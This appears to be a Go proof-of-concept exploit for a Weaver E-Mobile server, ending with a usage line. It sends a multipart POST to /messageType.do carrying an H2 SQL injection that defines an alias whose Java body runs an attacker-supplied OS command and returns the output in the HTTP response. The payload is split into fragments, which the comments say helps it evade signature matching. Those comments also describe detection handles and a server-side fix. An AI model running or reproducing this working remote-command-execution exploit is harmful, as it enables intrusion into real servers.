package main
import (
"bytes"
"fmt"
"github.com/hpifu/go-kit/hflag"
"io/ioutil"
"mime/multipart"
"net/http"
"net/url"
"os"
"strings"
)
// main is the command-line entry point: it reads the target URL and the
// command from the flags registered by getParam and hands both to exploit.
func main() {
	exploit(getParam())
}
// exploit sends a single multipart/form-data POST to <host>/messageType.do
// whose "typeName" field carries the SQL string p, then prints whatever the
// server returns in the response body. The command is url.QueryEscape'd
// before it is embedded as the argument of the CALL statement.
//
// What the request looks like on the wire (the useful handles for a detection
// rule or a WAF signature):
//   - POST to the path /messageType.do, Content-Type multipart/form-data
//   - form field method=create
//   - form field typeName starting with `1';CREATE ALIAS if not exists ...`
//     and ending with `CALL ...('<escaped command>');--`
// The Java source of the alias is assembled from short fragments joined by
// CONCAT, so a pattern looking for the contiguous names (java.lang.Runtime,
// ServletInvocation, ...) will likely not see them in the raw request body;
// matching the SQL keywords CREATE ALIAS / CALL inside typeName is more
// robust. Server-side, the fix is to never interpolate the typeName value
// into SQL and to not expose a database account that may CREATE ALIAS.
//
// Parameters:
//   host    - base URL of the server. http.NewRequest's error is ignored
//             below, so a malformed value yields a nil request and a nil
//             dereference on the first Header.Set.
//   command - the OS command string embedded in the SQL.
//
// Known defects, left unchanged (see inline notes): errors from
// CreateFormField, NewRequest and Do are ignored or only printed, the
// deferred Close and ReadAll run even when Do failed, and the hard-coded
// Content-Length header is not what net/http puts on the wire.
func exploit(host, command string) {
	// SQL injected through the typeName value: `1'` closes the quoted value,
	// CREATE ALIAS defines an H2 user-defined function whose body is Java
	// source (CONCAT of the fragments), CALL invokes it with the escaped
	// command, and `--` comments out the rest of the server's statement.
	// The Java body resolves the current servlet request through the
	// com.caucho (Resin) ServletInvocation class, reaches the response via
	// the private _response field, runs the command with Runtime.exec and
	// writes its stdout into the HTTP response, which is why the output is
	// readable from the body below.
	p := "1';CREATE ALIAS if not exists MzSNqKsZTagm AS CONCAT('void e(String cmd) throws java.la','ng.Exception{','Object curren','tRequest = Thre','ad.currentT','hread().getConte','xtClass','Loader().loadC','lass(\"com.caucho.server.dispatch.ServletInvocation\").getMet','hod(\"getContextRequest\").inv','oke(null);java.la','ng.reflect.Field _responseF = currentRequest.getCl','ass().getSuperc','lass().getDeclar','edField(\"_response\");_responseF.setAcce','ssible(true);Object response = _responseF.get(currentRequest);java.la','ng.reflect.Method getWriterM = response.getCl','ass().getMethod(\"getWriter\");java.i','o.Writer writer = (java.i','o.Writer)getWriterM.inv','oke(response);java.ut','il.Scan','ner scan','ner = (new java.util.Scann','er(Runt','ime.getRunt','ime().ex','ec(cmd).getInput','Stream())).useDelimiter(\"\\\\A\");writer.write(scan','ner.hasNext()?sca','nner.next():\"\");}');CALL MzSNqKsZTagm('" + url.QueryEscape(command) + "');--"
	// Zero-value client: no timeout, so a server that accepts the connection
	// and never answers blocks this function forever.
	c := http.Client{}
	buffer := &bytes.Buffer{}
	writer := multipart.NewWriter(buffer)
	// Two form fields; the errors from CreateFormField are discarded.
	field, _ := writer.CreateFormField("method")
	field.Write([]byte("create"))
	formField, _ := writer.CreateFormField("typeName")
	formField.Write([]byte(p))
	_ = writer.Close()
	// Collapse a doubled slash when host already ends with "/"; only the
	// first occurrence of "//mess" is rewritten.
	target := strings.Replace(host+"/messageType.do", "//mess", "/mess", 1)
	// NOTE: the error is dropped; on a bad URL request is nil and the next
	// line panics.
	request, _ := http.NewRequest(http.MethodPost, target, strings.NewReader(buffer.String()))
	request.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36")
	request.Header.Set("Accept", "*/*")
	request.Header.Set("Connection", "close")
	request.Header.Set("Content-Type", writer.FormDataContentType())
	// Per the net/http docs, Content-Length in Header may be ignored for
	// client requests; the transport uses request.ContentLength, which
	// NewRequest derived from the strings.Reader, so "1142" is not sent.
	request.Header.Set("Content-Length", "1142")
	// An explicit (empty) Accept-Encoding stops the Transport from adding
	// "gzip" and from transparently decompressing the response.
	request.Header.Set("Accept-Encoding", "")
	do, err := c.Do(request)
	if err != nil {
		// NOTE: the error is printed but execution continues with do == nil;
		// the deferred Close and ReadAll below then dereference a nil pointer.
		// A `return` here would be the minimal fix.
		fmt.Println(err)
	}
	defer func() {
		_ = do.Body.Close()
	}()
	// ioutil.ReadAll is deprecated since Go 1.16; io.ReadAll is equivalent.
	all, err := ioutil.ReadAll(do.Body)
	if err != nil {
		fmt.Println(err)
	}
	// An exact {"status":false} body is treated as "the server did not
	// accept the command" (the message: invalid command, perhaps unsupported
	// by the server or some other condition).
	if string(all) == "{\"status\":false}" {
		fmt.Println("无效的命令,也许是服务器不支持或其他情况")
		return
	}
	// Strip the server's own JSON reply (msg: "push type already exists")
	// so only the text the alias wrote into the response remains.
	// fmt.Sprintf("%s", all) is just string(all).
	result := strings.Replace(fmt.Sprintf("%s", all), "{\"status\":false,\"ID\":\"1\",\"msg\":\"推送类型已存在\"}", "", -1)
	fmt.Println("\n", result)
}
// getParam registers the two required command-line flags, parses the
// command line and returns the flag values.
//
// Returns:
//   t - value of --target / -t (server base URL)
//   c - value of --command / -c (command string)
//
// On a parse error the usage text is printed on stdout and the process
// terminates; note the exit status is 0, so a wrapping script cannot
// distinguish a usage error from success.
func getParam() (t, c string) {
	const (
		targetFlag  = "target"
		commandFlag = "command"
	)
	hflag.AddFlag(targetFlag, "泛微E-MobileServer-地址", hflag.Required(), hflag.Shorthand("t"))
	hflag.AddFlag(commandFlag, "待执行的系统命令", hflag.Required(), hflag.Shorthand("c"))
	if parseErr := hflag.Parse(); parseErr != nil {
		fmt.Println(hflag.Usage())
		os.Exit(0)
	}
	t = hflag.GetString(targetFlag)
	c = hflag.GetString(commandFlag)
	return t, c
}
go run poc.go -t http://目标 -c 执行命令